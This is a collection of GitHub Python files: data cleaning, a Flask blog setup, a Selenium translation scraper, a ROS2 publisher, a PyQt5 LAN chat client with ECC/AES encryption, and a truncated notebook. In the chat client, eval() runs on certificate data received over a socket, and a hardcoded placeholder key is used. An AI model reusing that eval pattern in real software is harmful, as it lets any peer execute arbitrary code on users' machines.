= ['index', 'subject', 'color', 'gi', 'mi', \\\n 'status', 'bp', 'wp', 'response', 'rt', \\\n 'time', 'mouse_t', 'mouse_x']\n self.full_output_columns = ['subject', 'is_comp', 'color', 'status', \\\n 'bp', 'wp', 'response', 'rt', 'gi', 'mi', \\\n 'computer', 'human', 'time', 'a', 'b', \\\n 'aval', 'bval', 'val']\n self.game_model_columns = ['subject', 'color', 'bp', 'wp', 'response', 'rt']\n\n\n def load_file(self, folder, file_name, mouse=False):\n \"\"\" Initial preparation of data for individual files \"\"\"\n\n # load file, drop nuissance columns, remove non-observations\n drop_cols = ['index'] if mouse else ['index', 'mouse_t', 'mouse_x']\n data = pd.read_csv(folder + file_name, names=self.original_columns).drop(drop_cols, axis=1)\n drop_status = (data.status != 'dummy') & (data.status != 'ready') & (data.status != 'draw offer')\n data = data.loc[drop_status, :].copy().reset_index(drop=True)\n\n # assign unique subject label (from filename) and create separate cols for humans and computers\n sub_filter = data.rt > 0\n comp_filter = data.rt == 0\n first_move_filter = (data.mi == 0) & (data.gi%2 == 0)\n second_move_filter = (data.mi == 1) & (data.gi%2 == 0)\n\n data.loc[data.rt > 0, 'subject'] = file_name[:-4]\n data.loc[:, 'human'] = file_name[:-4]\n data.loc[:, 'computer'] = np.nan\n data.loc[comp_filter, 'computer'] = data.loc[comp_filter, 'subject']\n data.loc[first_move_filter, 'computer'] = data.loc[second_move_filter, 'computer']\n data.loc[:, 'computer'] = data.loc[:, 'computer'].fillna(method='ffill')\n data.loc[0, 'computer'] = data.loc[1, 'computer']\n\n return data\n\n\n\n\n\ndef clean(csv_file, subject_dict):\n cols = [\"index\", \"gi\", \"mi\", \"status\", \"player\", \"color\", \"response\", \"bp\", \"wp\", \"rt\", \"time\", \"IP\"]\n data = pd.read_csv(csv_file, names=cols)\n data = data.loc[(data.status != 'dummy') & (data.status != 'ready') & (data.status != 'draw offer') & (data.status != 'time loss')]\n data.loc[:, \"bplen\"] = [len(data.loc[i, 'bp']) for i in data.index.values]\n data.loc[:, \"wplen\"] = [len(data.loc[i, 'wp']) for i in data.index.values]\n data = data.loc[(data.bplen == 36) & (data.wplen == 36) & (data.response != 36)]\n data.mi = data.mi - 1\n data.rt = data.rt / 1000\n cmap = {'B':0, 'W':1}\n smap = {'in progress':'playing', 'win':'win', 'draw':'draw'}\n data[\"color\"] = data.color.map(cmap)\n data[\"status\"] = data.status.map(smap)\n data[\"subject\"] = data.IP.map(subject_dict)\n data = data.drop([\"bplen\", \"wplen\", \"index\", \"player\", \"IP\"], axis=1).reset_index(drop=True)\n for i in data.index.values:\n if data.loc[i,'color'] == 0:\n temp = list(data.loc[i,'bp'])\n temp[int(data.loc[i,'response'])] = '0'\n data.loc[i, 'bp'] = \"\".join(temp)\n else:\n temp = list(data.loc[i,'wp'])\n temp[int(data.loc[i,'response'])] = '0'\n data.loc[i, 'wp'] = \"\".join(temp)\n\n reindex_list = [\"subject\",\"color\",\"gi\",\"mi\",\"status\",\"bp\",\"wp\",\"response\",\"rt\",'time']\n data = data.reindex_axis(reindex_list, axis=1)\n return data\n","repo_name":"galbiati/mnk-cleaning-analysis","sub_path":"src/clean_hvh.py","file_name":"clean_hvh.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73268818979","text":"import random\n\n\nclass EpsilonDecay:\n\n def __init__(self, start, end, steps):\n self.start = start\n self.end = end\n self.e = self.start\n self.steps = steps\n self.decay = -((self.start - self.end) / self.steps)\n\n def eval(self):\n t = False\n if random.random() < self.e:\n t = True\n\n self.e = max(self.end, self.e + self.decay)\n return t","repo_name":"cair/deep-line-wars","sub_path":"deep_line_wars_examples/per_rl/sampling/epsilon_decay.py","file_name":"epsilon_decay.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"22109030071","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('testimonial', '0006_testimonialitem_order'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='testimonialitem',\n name='name',\n field=models.TextField(blank=True),\n ),\n ]\n","repo_name":"betoncombat/betoncombat","sub_path":"testimonial/migrations/0007_testimonialitem_name.py","file_name":"0007_testimonialitem_name.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29683540052","text":"from .. import db\n\ngbans = db.gbans\nnotes = db.notes\nwarns = db.warns\napproved = db.approved\n\n\nasync def log_warn(userid: int,count: int):\n await warns.update_one(\n {'USERID':userid},\n {'$set':{\n 'WARNCOUNT':count\n }},upsert=True\n )\n\nasync def get_warn(userid):\n data = await warns.find_one({'USERID':userid})\n return data\n\nasync def del_warn(userid):\n if await get_warn(userid):\n await warns.delete_one({'USERID':userid})\n else:pass\n\nasync def is_approved(userid):\n data = await approved.find_one({'USERID':userid})\n return True if data else False\n\nasync def approve_user(userid):\n if await is_approved(userid):return False\n await approved.insert_one({'USERID':userid})\n return True\n\nasync def disapprove_user(userid):\n if not await is_approved(userid):return False\n await approved.delete_one({'USERID':userid})\n return True\n\nasync def save_note(notename,data):\n notename = notename.lower().strip()\n await notes.update_one(\n {'NOTENAME':notename},\n {'$set':{\n 'META':data\n }},upsert=True\n )\n\nasync def del_note(notename):\n data = await notes.find_one({'NOTENAME':notename})\n if not data:return False\n await notes.delete_one({'NOTENAME':notename})\n return True\n\nasync def get_notes():\n names = []\n async for x in notes.find({}):\n names.append(x['NOTENAME'])\n return names\n\nasync def get_a_note(notename):\n notename = notename.lower().strip()\n data = await notes.find_one({'NOTENAME':notename})\n return data['META'] if data else None\n\n","repo_name":"maxaret24/nebulus","sub_path":"ub/core/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"9364009039","text":"from selenium import webdriver\nfrom time import sleep\nfrom bs4 import BeautifulSoup\n\nbrowser = webdriver.Chrome(\"../chromdriver/chromedriver.exe\")\nbrowser.maximize_window()\n\nbrowser.get(\"https://papago.naver.com/\")\n\nf = open(\"../files/naver_movie_code.txt\", 'r', encoding=\"UTF-8\")\n\nnum = 0\nmovie_codes = []\nmovie_names = []\n\nwhile True:\n temp = f.readline().split('\\n')[0]\n\n if temp == '':\n break\n\n if num % 2 == 1:\n movie_codes.append(temp)\n else:\n movie_names.append(temp)\n\n num = num + 1\n\nf.close()\n\nsleep(5)\n\nfor cnt in range(len(movie_codes)):\n \n f = open(\"../reviews/naver_movie_review_\" + str(cnt + 1) + \"_\" + movie_codes[cnt] + \".txt\", 'r', encoding=\"UTF-8\")\n\n reviews = f.read().split('\\n')[1:-1]\n f.close()\n\n f = open(\"../translation/naver_movie_review_\" + str(cnt + 1) + \"_\" + movie_codes[cnt] + \".txt\", 'w', encoding=\"UTF-8\")\n f.write(movie_names[cnt] + '\\n')\n f.close()\n\n for i in range(len(reviews)):\n try:\n f = open(\"../translation/naver_movie_review_\" + str(cnt + 1) + \"_\" + movie_codes[cnt] + \".txt\", 'a', encoding=\"UTF-8\")\n\n review = reviews[i].split(',')\n review[1] = ','.join(review[1:])\n review = review[:2]\n\n if review[1] == '':\n print('평점: ' + review[0])\n print('한글 리뷰: ' + review[1])\n print('영어 리뷰: ' + review[1])\n print()\n\n f.write(review[0] + ',')\n f.write(review[1] + '\\n')\n\n f.close()\n continue\n\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[3]/label\").click()\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[3]/label\").send_keys(review[1])\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[4]/div/button\").click()\n \n sleep(5)\n\n soup = BeautifulSoup(browser.page_source, \"lxml\")\n result = soup.find(\"div\", attrs={\"id\":\"txtTarget\"}).find(\"span\").text\n\n print('평점: ' + review[0])\n print('한글 리뷰: ' + review[1])\n print('영어 리뷰: ' + result)\n print()\n\n f.write(review[0] + ',')\n f.write(result + '\\n')\n\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[3]/label/textarea\").click()\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[3]/label/textarea\").clear()\n \n f.close()\n except:\n f.close()","repo_name":"KiHyeon-Hong/Naver_movie_review_transfer_learning","sub_path":"src/naver_movie_review_translation.py","file_name":"naver_movie_review_translation.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4075501320","text":"from collections import deque\r\n\r\nqueue = deque()\r\n\r\nfor q in range(int(input())):\r\n command = input()\r\n if command.startswith(\"1\"):\r\n queue.append(int(command.split()[1]))\r\n else:\r\n if queue:\r\n if command == \"2\":\r\n queue.pop()\r\n elif command == \"3\":\r\n print(max(queue))\r\n elif command == \"4\":\r\n print(min(queue))\r\n\r\nrev_q = []\r\n\r\nwhile queue:\r\n rev_q.append(str(queue.pop()))\r\nprint(\", \".join(rev_q))","repo_name":"naskk202/demo_projects","sub_path":"advance/stacks_and_queues/max_and_min_elements.py","file_name":"max_and_min_elements.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37423186536","text":"from flask import Flask\nfrom flask_bcrypt import Bcrypt\nfrom flask_login import LoginManager\nfrom flask_sqlalchemy import SQLAlchemy\nfrom celery import Celery\n\nfrom flask_mail import Mail\nfrom flaskblog.config import Config\n\napp = Flask(__name__)\napp.config.from_object(Config)\n\ndb = SQLAlchemy()\nbcrypt = Bcrypt()\nlogin_manager = LoginManager()\nlogin_manager.login_view = \"users.login\"\nlogin_manager.login_message_category = \"info\"\nmail = Mail()\n\n\ndb.init_app(app)\nbcrypt.init_app(app)\nlogin_manager.init_app(app)\nmail.init_app(app)\n\n\ndef make_celery(app):\n celery = Celery(\n app.import_name,\n broker=\"redis://redis:6379/0\",\n backend=\"redis://redis:6379/1\",\n include=[\"flaskblog.users.utils\"],\n )\n celery.conf.update(app.config)\n\n class ContextTask(celery.Task):\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return self.run(*args, **kwargs)\n\n celery.Task = ContextTask\n return celery\n\n\ncelery_app = make_celery(app)\n\n\ndef create_app():\n from flaskblog.users.routes import users\n from flaskblog.posts.routes import posts\n from flaskblog.main.routes import main\n from flaskblog.errors.handlers import errors\n\n app.register_blueprint(users)\n app.register_blueprint(posts)\n app.register_blueprint(main)\n app.register_blueprint(errors)\n\n return app\n","repo_name":"kangheeyong/TEST-flask-blog","sub_path":"web/flaskblog/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21374514721","text":"# -*- coding: utf-8 -*-\n# @Time: 21:10\nfrom PyQt5.QtWidgets import QMainWindow, QFileDialog\n\nfrom Utils.GetCurrentTime import get_time\nfrom Utils.GetMyIP import get_my_lan_ip\nfrom Utils.AESencode import encrypt, decrypt\nfrom Utils.ECCmisc import get_key, ECC_encrypt, ECC_decrypt, ip_str2int\nfrom UI.QuickChat import Ui_MainWindow\n\nimport socket\nimport threading\nimport pyaudio\nimport random\nimport string\nimport pathlib\nimport struct\nimport json\nimport time\n\nimport datetime\n\n\nclass AudioClient(QMainWindow, Ui_MainWindow):\n def __init__(self):\n # super(Client, self).__init__()\n super().__init__()\n self.setupUi(self)\n\n self.s_audio = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_control = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_text = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_file = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_cert = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_multi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # SlotFunc\n # 语音传输\n self.btn_CTServer.clicked.connect(self.connect_to_server)\n self.btn_DTServer.clicked.connect(self.disconnect_to_server)\n self.btn_StartAudio.clicked.connect(self.start_audio)\n self.btn_CloseAudio.clicked.connect(self.close_audio)\n self.btn_Clear.clicked.connect(self.clear_info)\n\n # 建立连接:发送要聊天的ip\n self.btn_Connect.clicked.connect(self.build_connection)\n\n # 开始扫描,收到在线的ip\n self.btn_Scan.clicked.connect(self.start_to_scan)\n\n # 发��文字\n self.btn_SendText.clicked.connect(self.send_text)\n\n # 刷新聊天框\n self.btn_Refresh.clicked.connect(self.refresh_chat_box)\n\n # 发送文件\n self.btn_SendFile.clicked.connect(self.send_file_action)\n\n # 群聊\n self.btn_Refresh_2.clicked.connect(self.refresh_multi_chat_box)\n self.btn_MultiSendText.clicked.connect(self.send_multi_text)\n\n self.chunk_size = 1024 # 512\n self.audio_format = pyaudio.paInt16\n self.channels = 1\n self.rate = 20000\n self.target_ip = \"\"\n self.target_audio_port = 0\n self.target_control_port = 0\n self.target_text_port = 0\n self.target_file_port = 0\n self.target_cert_port = 0\n self.target_multi_port = 0\n\n self.AudioInfoText = \"\"\n self.is_send_audio = False\n self.is_receive_audio = False\n self.is_connected = False\n self.is_receive_text = False\n self.is_send_cert = False\n self.is_receive_file = False\n self.is_receive_multi_text = False\n\n self.connect_ip_data = \"\"\n self.scan_requirement = \"Requirement for scanning all online sockets\"\n self.offline_requirement = \"Requirement for deleting my socket\"\n\n self.p = pyaudio.PyAudio()\n self.playing_stream = 0\n self.recording_stream = 0\n\n self.textB_MyIP.setText(get_my_lan_ip())\n\n # 记录自己和接收到的文字\n self.ChatText = \"\"\n self.ChatText_pre = get_my_lan_ip() + \"\\n(\" + socket.gethostname() + \")\" + \":\"\n\n # 群聊\n self.MultiChatText = \"\"\n self.MultiChatText_pre = get_my_lan_ip() + \"\\n(\" + socket.gethostname() + \")\" + \":\"\n\n # 自己的私钥、收到的公钥\n self.myAESKEY = random.sample(string.ascii_letters, 16)\n self.myAESKEY = \"\".join(self.myAESKEY)\n self.youAESKEY = \"1234567891111111\"\n self.connections_keylist = {}\n self.myECCKEY = 0\n\n def receive_audio(self):\n while self.is_receive_audio:\n try:\n data = self.s_audio.recv(1024)\n print(type(data))\n self.playing_stream.write(data)\n except:\n pass\n print(\"The thread of receiver is killed\")\n\n def send_audio(self):\n while self.is_send_audio:\n try:\n data = self.recording_stream.read(1024)\n self.s_audio.sendall(data)\n except:\n pass\n print(\"The thread of sender is killed\")\n\n def connect_to_server(self):\n self.s_audio = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_control = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_text = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_file = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_cert = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_multi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # print(self.textE_ServerIP.text())\n # while 1:\n try:\n self.target_ip = self.textE_ServerIP.text()\n self.target_audio_port = int(self.textE_AudioServerPort.text())\n self.s_audio.connect((self.target_ip, self.target_audio_port))\n\n # self.target_ip = self.textE_ServerIP.text()\n self.target_control_port = int(self.textE_ControlServerPort.text())\n self.s_control.connect((self.target_ip, self.target_control_port))\n\n # self.target_ip = self.textE_ServerIP.text()\n self.target_text_port = int(self.textE_TextServerPort.text())\n self.s_text.connect((self.target_ip, self.target_text_port))\n\n # self.target_ip = self.textE_ServerIP.text()\n self.target_file_port = int(self.textE_FileServerPort.text())\n self.s_file.connect((self.target_ip, self.target_file_port))\n\n self.target_cert_port = int(self.textE_CertServerPort.text())\n self.s_cert.connect((self.target_ip, self.target_cert_port))\n\n self.target_multi_port = int(self.textE_MultiChatPort.text())\n self.s_multi.connect((self.target_ip, self.target_multi_port))\n\n print(\"Connected to Server\")\n self.AudioInfoText += \"Connected to Server\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n self.is_connected = True\n self.is_receive_audio = True\n self.is_receive_text = True\n self.is_send_cert = True\n self.is_receive_file = True\n self.is_receive_multi_text = True\n\n # 发送公钥,留私钥,key[0]为私钥key,key[1]、key[2]为公钥KEY_X KEY_Y\n ip = get_my_lan_ip()\n ip = ip_str2int(ip)\n self.myECCKEY = get_key(ip)\n print(self.myECCKEY)\n self.s_control.send(str(ip).encode() + \" \".encode() + str(self.myECCKEY[1]).encode() + \" \".encode() + str(\n self.myECCKEY[2]).encode())\n\n # 开始接听\n self.playing_stream = self.p.open(format=self.audio_format, channels=self.channels, rate=self.rate,\n output=True,\n frames_per_buffer=self.chunk_size)\n receive_audio_thread = threading.Thread(target=self.receive_audio).start()\n receive_text_thread = threading.Thread(target=self.receive_text).start()\n send_cert_thread = threading.Thread(target=self.send_cert).start()\n receive_file_thread = threading.Thread(target=self.receive_file).start()\n receive_multi_text_thread = threading.Thread(target=self.receive_multi_text).start()\n\n # test\n # display_text_chat_thread = threading.Thread(target=self.display_text_chat).start()\n\n print(\"正在接听...\")\n self.AudioInfoText += \"正在接听...\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n\n # 接收ip\n # receive_ip_thread = threading.Thread(target=self.receive_server_ip).start()\n # break\n except:\n print(\"Couldn't connect to server\")\n self.AudioInfoText += \"Couldn't connect to server\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n # break\n\n def muti_send_offline_requirement(self, msg):\n i = 10\n while i > 0:\n i -= 1\n self.s_control.send(msg)\n\n def disconnect_to_server(self):\n if self.is_connected:\n # 发送给服务器,服务器删掉自己的socket\n # self.s_control.send(self.offline_requirement.encode())\n self.muti_send_offline_requirement(self.offline_requirement.encode())\n\n self.s_audio.close()\n self.s_text.close()\n self.s_control.close()\n self.s_file.close()\n self.s_cert.close()\n self.s_multi.close()\n\n print(\"Disconnected to Server\")\n self.AudioInfoText += \"Disconnected to Server\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n self.is_connected = False\n self.is_receive_audio = False\n self.is_send_audio = False\n self.is_receive_text = False\n self.is_send_cert = False\n self.is_receive_file = False\n self.is_receive_multi_text = False\n\n self.recording_stream = 0\n print(\"停止接听\")\n self.AudioInfoText += \"停止接听\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def start_audio(self):\n if self.is_connected:\n self.is_send_audio = True\n # 语音\n self.recording_stream = self.p.open(format=self.audio_format, channels=self.channels, rate=self.rate,\n input=True,\n frames_per_buffer=self.chunk_size)\n # print(self.p)\n # print(self.playing_stream)\n # print(self.recording_stream)\n # start threads\n send_audio_thread = threading.Thread(target=self.send_audio).start()\n\n print(\"正在语音通话...\")\n self.AudioInfoText += \"正在语音通话...\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def close_audio(self):\n if self.is_connected:\n self.is_send_audio = False\n # self.playing_stream = 0\n self.recording_stream = 0\n print(\"语音已关闭\")\n self.AudioInfoText += \"语音已关闭\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n # receive_thread = threading.Thread(target=self.receive_server_data)._delete()\n # send_thread = threading.Thread(target=self.send_data_to_server)._delete()\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def clear_info(self):\n self.AudioInfoText = \"\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n # 建立连接\n def build_connection(self):\n if self.is_connected:\n self.connect_ip_data = ip_str2int(self.textE_InputIP.text())\n self.s_cert.send(str(self.connect_ip_data).encode())\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def send_cert(self):\n while self.is_send_cert:\n try:\n recv_KEY = self.s_cert.recv(1024)\n recv_KEY = recv_KEY.decode()\n # print(recv_KEY)\n KEY_list = recv_KEY.split(\" \")\n # print(KEY_list)\n print(\"my keys\", self.myAESKEY, int(KEY_list[0]), int(KEY_list[1]))\n cert = ECC_encrypt(self.myAESKEY, int(KEY_list[0]), int(KEY_list[1]));\n print(\"str\" + str(cert))\n print(list(cert))\n\n self.s_cert.send(str(cert).encode())\n print(\"my cert send\")\n\n input_cert = self.s_cert.recv(1024)\n print(\"your cert recv\")\n\n input_cert = input_cert.decode()\n print(\"input_cert\", type(input_cert), input_cert)\n\n input_cert = eval(input_cert)\n print(\"input_cert\", type(input_cert), input_cert)\n\n self.youAESKEY = ECC_decrypt(self.myECCKEY[0], input_cert)\n print(\"youAESKEY\", self.youAESKEY)\n\n except:\n print(\"??\")\n\n # 控制信号:请求与Server绑定的ip\n # 开始扫描\n def start_to_scan(self):\n if self.is_connected:\n # self.control_info = \"a\"\n self.muti_send_offline_requirement(self.scan_requirement.encode())\n # self.s_control.send(self.scan_requirement.encode())\n self.receive_client_ip()\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def receive_client_ip(self):\n while True:\n try:\n recv_data = self.s_control.recv(1024)\n print(recv_data.decode())\n print(type(recv_data.decode()))\n self.textB_RecvIP.setText(recv_data.decode())\n print(\"!!!\")\n break\n except:\n pass\n # print(\"The thread of receiver is killed\")\n\n def send_text(self):\n if self.is_connected:\n current_time = get_time()\n send_text = \"[\" + current_time + \"]\" + self.ChatText_pre + self.textE_TextInput.toPlainText() + '\\n'\n self.ChatText += send_text\n self.textE_TextInput.setPlainText(\"\")\n self.textB_TextChat.setText(self.ChatText)\n send_text = encrypt(send_text, self.myAESKEY.encode('utf-8'))\n print(send_text)\n self.s_text.send(send_text)\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def receive_text(self):\n while self.is_receive_text:\n try:\n print(\"是否循环?\")\n recv_text = self.s_text.recv(1024)\n print(\"1\")\n print(recv_text.decode(), self.youAESKEY.encode('utf-8'))\n\n if self.youAESKEY == \"1234567891111111\":\n print(\"加密的信息,无法解密\")\n self.ChatText += \"加密的信息,无法解密\" + '\\n'\n print(self.ChatText)\n continue\n\n recv_text = decrypt(recv_text.decode(), self.youAESKEY.encode('utf-8'))\n print(\"2\")\n # print(recv_text)\n self.ChatText += recv_text\n print(\"3\")\n print(self.ChatText)\n # 这出问题了!!\n # 不能放到线程里\n # self.display_text_chat()\n # self.textB_TextChat.setText(self.ChatText)\n print(\"4\")\n except:\n print(\"??\")\n # finally:\n # self.textB_TextChat.setText(self.ChatText)\n\n def send_multi_text(self):\n if self.is_connected:\n current_time = get_time()\n send_text = \"[\" + current_time + \"]\" + self.MultiChatText_pre + self.textE_MultiTextInput.toPlainText() + '\\n'\n self.MultiChatText += send_text\n self.textE_MultiTextInput.setPlainText(\"\")\n self.textB_MultiTextChat.setText(self.MultiChatText)\n print(send_text)\n self.s_multi.send(send_text.encode())\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def receive_multi_text(self):\n while self.is_receive_multi_text:\n try:\n # print(\"是否循环?\")\n recv_text = self.s_multi.recv(1024)\n # print(\"1\")\n # print(recv_text.decode(), self.youAESKEY.encode('utf-8'))\n recv_text = recv_text.decode()\n self.MultiChatText += recv_text\n print(self.MultiChatText)\n # 这出问题了!!\n # 不能放到线程里\n # self.display_text_chat()\n # self.textB_TextChat.setText(self.ChatText)\n except:\n print(\"??\")\n # finally:\n # self.textB_TextChat.setText(self.ChatText)\n\n def display_text_chat(self):\n self.textB_TextChat.setText(self.ChatText)\n\n def receive_file(self):\n while self.is_receive_file:\n try:\n four_head_bytes = self.s_file.recv(4)\n # 接收报头字典的固定字节\n\n len_head_dic_json_bytes = struct.unpack(\"i\", four_head_bytes)[0]\n # 报头字典的字节数\n\n head_dic_json_bytes = self.s_file.recv(len_head_dic_json_bytes)\n # 接收报头字典字节\n\n head_dic = json.loads(head_dic_json_bytes.decode(\"utf-8\"))\n # 报头字典\n\n # print('head_dic:')\n # print(head_dic)\n suffix = head_dic['suffix']\n\n recv_size = 0\n recv_data = b''\n while recv_size < head_dic['total_size']:\n part_data = self.s_file.recv(1024)\n recv_data += part_data\n recv_size += len(part_data)\n print(part_data)\n\n print('接收文件')\n file_path = self.testE_FilePath.text()\n path = str(file_path) + '\\\\' + time.strftime(\"%Y%m%d%H%M%S\", time.localtime()) + suffix\n # path = r'C:\\Users\\0w0\\Desktop\\recv_test' + '\\\\' + time.strftime(\"%Y%m%d%H%M%S\", time.localtime()) + suffix\n\n with open(path, 'wb') as f:\n f.write(recv_data)\n except:\n print(\"??\")\n\n def send_file_action(self):\n if self.is_connected:\n file_name = self.select_file()\n if file_name is None:\n return\n print(file_name)\n threading.Thread(target=self.send_file, args=(file_name,)).start()\n # self.send_file(file_name)\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def select_file(self):\n r = QFileDialog.getOpenFileName(self, \"选择您想要传输的文件\", \"~/\")\n return r[0]\n\n def read_content(self, path):\n f = open(path, 'rb')\n suffix = pathlib.Path(path).suffix\n return f.read(), suffix\n\n def send_file(self, file_path):\n # file_path = r'C:\\Users\\Yyd的YOGA 14s\\Desktop\\证件照.jpg'\n data, suffix = self.read_content(file_path)\n total_size = len(data)\n\n head_dic = {'suffix': suffix, 'total_size': total_size}\n # 报头字典\n\n head_dic_json_bytes = json.dumps(head_dic).encode(\"utf-8\")\n # 报头字典str然后转字节\n\n len_head_dic_json_bytes = len(head_dic_json_bytes)\n # 报头字典str字节数\n print(len_head_dic_json_bytes)\n four_head_bytes = struct.pack(\"i\", len_head_dic_json_bytes)\n # 制作报头字典字节int的固定字节数\n\n self.s_file.send(four_head_bytes)\n # 发送报头字典字节int的固定字节数\n\n self.s_file.send(head_dic_json_bytes)\n # 发送报头字典\n\n self.s_file.send(data)\n # print(data)\n # SendFileThread(file_path, self.s_file).start()\n\n def refresh_chat_box(self):\n self.textB_TextChat.setText(self.ChatText)\n\n def refresh_multi_chat_box(self):\n self.textB_MultiTextChat.setText(self.MultiChatText)\n\n# if __name__ == '__main__':\n# client = Client()\n","repo_name":"ChenVoid/QuickChat-PyQT5-LAN","sub_path":"QuickChat_Client/AudioChat/AudioClient.py","file_name":"AudioClient.py","file_ext":"py","file_size_in_byte":20259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"15940082661","text":"import rclpy\nimport sys\n\nfrom rclpy.qos import qos_profile_system_default\nfrom rclpy.qos import qos_profile_sensor_data\n\nfrom .publisher import NumPublisher, StrPublisher, NumUnboundedArrayPublisher\n\n\nPUB_TYPE_IDX = 1\nQOS_TYPE_IDX = 2\n\n\ndef publisherFactory(pub: str, period: int, qos: int):\n if qos == '0':\n qos = qos_profile_system_default\n elif qos == '1':\n qos = qos_profile_sensor_data\n\n if pub == 'num':\n return NumPublisher(period, qos)\n elif pub == 'num_array':\n return NumUnboundedArrayPublisher(period, qos)\n elif pub == 'str':\n return StrPublisher(period, qos)\n\n\ndef main(args=None):\n time_period = 0.5\n pub_type = 'num'\n qos_type = 0\n if len(sys.argv) == 3: # vulnerable here\n pub_type = sys.argv[PUB_TYPE_IDX]\n qos_type= sys.argv[QOS_TYPE_IDX]\n\n rclpy.init(args=args)\n publisher = publisherFactory(pub=pub_type, period=time_period, qos=qos_type)\n rclpy.spin(publisher)\n publisher.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"flyotlin/ros2-dds-experiment","sub_path":"simple_pubsub/experiment_pubsub/publisher_function.py","file_name":"publisher_function.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1335564163","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport os\n\n\n# In[2]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[3]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[4]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier as dtree\n\n\n# In[5]:\n\n\nfrom sklearn.tree import export_graphviz\n\n\n# In[6]:\n\n\nfrom sklearn.datasets import load_iris\n\n\n# In[8]:\n\n\nfrom sklearn.tree import plot_tree\nimport matplotlib.pyplot as plt\n\n\n# In[9]:\n\n\nimport seaborn as sns\n\n\n# In[10]:\n\n\ndf = pd.read_csv(\"C:\\\\Users\\\\loket\\\\Downloads\\\\archive (1)\\\\income_evaluation.csv\")\n\n\n# In[12]:\n\n\ndf.head()\n\n\n# In[13]:\n\n\ndf.columns = list(map(lambda a: a.lstrip(), df.columns))\n\n\n# In[14]:\n\n\ndf.isnull().sum()\n\n\n# In[15]:\n\n\ndf.shape\n\n\n# In[16]:\n\n\ndf['workclass'].value_counts()\n\n\n# In[17]:\n\n\nshape0 = df.shape[0]\nfor column in df.columns:\n 